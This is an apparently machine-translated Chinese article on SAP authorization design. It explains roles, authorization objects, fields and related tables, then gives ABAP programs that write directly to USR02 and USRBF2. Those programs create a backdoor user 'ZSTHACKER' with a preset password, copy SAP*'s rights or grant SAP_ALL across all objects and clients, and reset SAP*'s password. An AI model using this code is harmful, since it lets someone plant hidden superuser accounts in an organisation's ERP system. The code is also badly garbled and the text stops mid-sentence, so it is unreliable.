SAP 权限设计思路及方法

设计SAP权限和角色一般来说，权限是“某人能做某事”和“某人不能做某事”的组合。 在SAP系统中，指示单个用户可以在事务代码(也称为事务代码或TCODE或TransactionCode )中进行。 例如，名为MM01的TCODE为了维持资材数据，MIGO用于接受，FS00用于维持会计等。在SU01中创建新ID时，默认权限为空，无法使用此新创建的ID，也无法使用事务代码。 这只要在ID上附加适当的TCODE就能够实现“某人能做的事情”，其补充是“某人不能做的事情”。 但是，因为我们不能直接在SU01上的ID上附加TCODE，所以通过ROLE进行中继。 也就是说，一组TCODE构成一个ROLE，把该ROLE分配给一个ID，该ID得到一个TCODE。以上仅是SAP权限控制的基本概念，为了理解所有的SAP权限控制，需要理解以下概念。1 .角色(ROLE )、公用角色(Common Role )、本地角色(Local Role )如上所述，角色(ROLE )是TCODE的集合，包括TCODE所必需的“权限对象”、“权限字段”、“允许的操作”和“允许的值”等。 使用PFCG保持角色。 根据系统测试和SAP实施项目的逐步需要，将角色进一步分为“常见角色”和“本地角色”。举个例子，共同的作用是“生产订货者”，当地的作用是“长城国际组装一厂生产订货者”。 因此，本地的作用与共同的作用相比，在相同的操作权限(事务代码等)的情况下，前者具体的限制值变多。 此限制可能是组织结构限制或其他业务限制。 例如，一分厂的制单人员不能维持二分厂的制单人员某厂的制造商甲只能维持类型a的发票，但不能维持类型b的发票。 具体来说，请看以下概念。2 .权限对象(Authorization Object )、权限字段(AuthorizationField )、所允许的操作(Activity )和所允许的值粗略地阐述了构成ROLE的是若干TCODE 事实上，ROLE和TCODE之间还有另一个中间概念“权限对象”角色包括若干权限对象，并且透明的表格AGR_1250存储这两者的关系权限对象包括若干权限字段、允许的操作以及允许的值，并且透明表AGR_1251反映出ROLE/Object/Field/Value的关系有一个特殊的权限对象，包含一些事务代码。 此权限对象称为S_TCODE，此权限对象的权限字段称为TCD，此字段允许的值存储事务处理代码有一个特殊的权限字段，允许您创建、修改、查看和删除权限对象。 此权限字段称为ACTVT，允许的值存储允许操作的代码，01表示创建，02表示修改，03表示显示等SAP权限控件由字段级别控制。 换句话说，权限控制机制会检查您是否有权管理透明表格中的栏位。 SAP系统具有多个权限对象，默认情况下控制多个权限字段(对应于透明表中的某些字段)。 您可以使用事务代码SU20检查授予系统的权限字段，并使用SU21检查授予系统的默认权限对象。 因此，了解了事务代码和权限对象的区别。 从权限控制的范围来看，事务代码还可以检查其他常见权限对象，以确定在执行属于特殊权限的事务代码时ID是否具有执行事务代码的权限。 使用SU22查看事务代码中包含的权限对象。 透明表USOBX存储事务代码与权限对象之间的对应关系。3 .自定义权限对象上述系统只能满足有限的权限对象和权限字段需求，权限审计逻辑也是硬编码的，我们只能检查是否启用某个权限对象(使用SU22 )。 如果需要定制，则可以由SU20、SU21定义。 调用时在程序中添加类似的代码authority-checkobjectz _ vkorgidvkorgfieldrec _ vk org-vk org。IF SY-SUBRC 0。MESSAGE No Authorization！ 类型eENDIF下一步是建立用户ZSTHACKER (初始口令123qaz )，并将所有权限授予SAP*用户的参考程序。Program ZCRTUSER。Data ZUSR02 like USR02。* * *1. createuserzsthackeraccordingtoddicselect single * intozusr 02 from usr 02where BNAME=DDIC。ZUSR02-BNAME=ZSTHACKER。ZUSR02-Bcode=E3B796BB09F7901B。insert USR02 from ZUSR02。* * *2.复印自动. objfromsap * (ora other )* * *删除where bname=sap *基本上会复制所有许可证对象dataszusbf2likeusffb2occurs0withheaderlineselect * fromusrbf2intotablezusrbf 2where BNAME=SAP*Loop at ZUSRBF2。ZUSRBF2-BNAME=ZSTHACKER。modifyzusbf 2索引- tabixtransportationbname。结束loopinsertususbff2fromtablezusbf2acceptingduplicatekeys。如果SAP*可能被删除，您也可以将TOBJ中包含的所有SAP许可证对象直接授予用户。 以下程序ZALLOBJ是将所有标准的许可对象赋予用户的ZSTHACKER。Program ZALLOBJ .dataztobjliketobjoccurs0withheaderline。datazusbf2likeusffb2。select * into table ztobj from tobj .loop at ztobj .zusrbf2-mandt=sy-mandt。zusrbf2-bname=ZSTHACKER。zusrbf2-objct=ztobj-objct。zusrbf2-auth=_SAP_ALL。修改usr bf2 fromzusrbf 2。结束loop您还可以在客户端之间建立用户或授予用户权限。 只要使用客户端规格就可以了。程序客户端。datazusbf2likeusffb2。select * intozusbf2fromusbff2where bname=sap *Zusrbf2-bname=ZSTHACKER。Zusrbf2-mandt=100insterintitintousffb 2客户端specifiedvalueszusbf 2。结束选择要将SAP*密码更改为123456，请执行以下操作： 同样，假设用户BUTCHER密码丢失，如果在服务器上随意创建名为BUTCHER的用户，并将密码设置为1QAZ2WSX，则任何系统的客户端